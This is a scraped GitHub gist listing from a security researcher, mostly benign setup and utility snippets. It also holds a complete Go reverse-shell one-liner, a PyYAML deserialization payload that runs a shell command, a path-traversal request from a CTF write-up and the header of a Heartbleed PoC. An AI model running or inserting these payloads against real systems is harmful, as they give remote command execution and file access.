Skip to content

Instantly share code, notes, and snippets.

takeshix takeshixx

Block or report user

Report or block takeshixx

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@takeshixx
takeshixx / ubuntu-xenial-armfh-qemu.md
Last active Sep 20, 2019
Running Ubuntu 16.04.1 armhf on Qemu
View ubuntu-xenial-armfh-qemu.md

Running Ubuntu 16.04.1 armhf on Qemu

This is a writeup about how to install Ubuntu 16.04.1 Xenial Xerus for the 32-bit hard-float ARMv7 (armhf) architecture on a Qemu VM via Ubuntu netboot.

The setup will create a Ubuntu VM with LPAE extensions (generic-lpae) enabled. However, this writeup should also work for non-LPAE (generic) kernels.

The performance of the resulting VM is quite good, and it allows VMs with >1G ram (compared to 256M on versatilepb and 1G on versatile-a9/versatile-a15). It also supports virtio disks whereas versatile-a9/versatile-a15 only support SD cards via the -sd argument.

Get netboot files

@takeshixx
takeshixx / hb-test.py
Last active Jul 20, 2019
OpenSSL heartbeat PoC with STARTTLS support.
View hb-test.py
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
View parser.c
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
#define ETH_HLEN 14
/*eBPF program.
Filter Packets
return 0 -> DROP the packet
return -1 -> KEEP the packet and return it to user space (userspace can read it from the socket_fd )
@takeshixx
takeshixx / csgoblog.py
Last active Dec 5, 2018
Poll CS:GO blog for new blog posts.
View csgoblog.py
#!/usr/bin/env python3
import sys
import time
import requests
import smtplib
import email.message
from lxml import html
SMTP_HOST = 'localhost'
SMTP_PORT = 25
@takeshixx
takeshixx / shell.go
Last active Oct 30, 2018
Golang reverse shell
View shell.go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
@takeshixx
takeshixx / asyncio_ssl_example.py
Created May 12, 2016 — forked from messa/asyncio_ssl_example.py
Python asyncio + SSL TCP client/server example
View asyncio_ssl_example.py
#!/usr/bin/env python3
import asyncio
import multiprocessing
import os
import ssl
from time import sleep
port = 9000
@takeshixx
takeshixx / contab-jails.sh
Last active Mar 22, 2017
Crontab script for FreeBSD Jails (update seperate ports tree, run portaudit, check for port updates)
View contab-jails.sh
#!/usr/local/bin/zsh
JAIL_PORTS=/usr/jails/ports
SHELL=/usr/local/bin/zsh
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:/root/bin
SECTION=' * * * * * * '
DELIMITER='------------------------------'
portsnap -p $JAIL_PORTS fetch extract &>/dev/null || echo "Updating ports tree failed!"
echo "# VULNERABILITIES"
@takeshixx
takeshixx / 33C3
Created Dec 27, 2016
33C3 WPA2 802.1X config for netctl
View 33C3
Description='33C3 WPA2 802.1x WiFi'
Interface=wlp4s0
Connection=wireless
Security=wpa-configsection
IP=dhcp
Essid=33C3
WPAConfigSection=(
'ssid="33C3"'
'proto=RSN WPA'
'key_mgmt=WPA-EAP'
@takeshixx
takeshixx / wtf.md
Last active Sep 19, 2016
CSAW CTF 2016 wtf.sh Writeup
View wtf.md

CSAW CTF 2016 wtf.sh Writeup

wtf.sh was a challenge that included two flags, one for 150pts and one for 400pts.

wtf.sh (1) (150pts)

In the first part we needed to call the function get_flag1 in order to receive the flag. The post parameter of post.wtf was vulnerable to a path traversal:

GET /profile.wtf?user=../posts HTTP/1.1
View yamlexec.py
yaml.load('!!python/object/apply:os.system ["id"]')
You can’t perform that action at this time.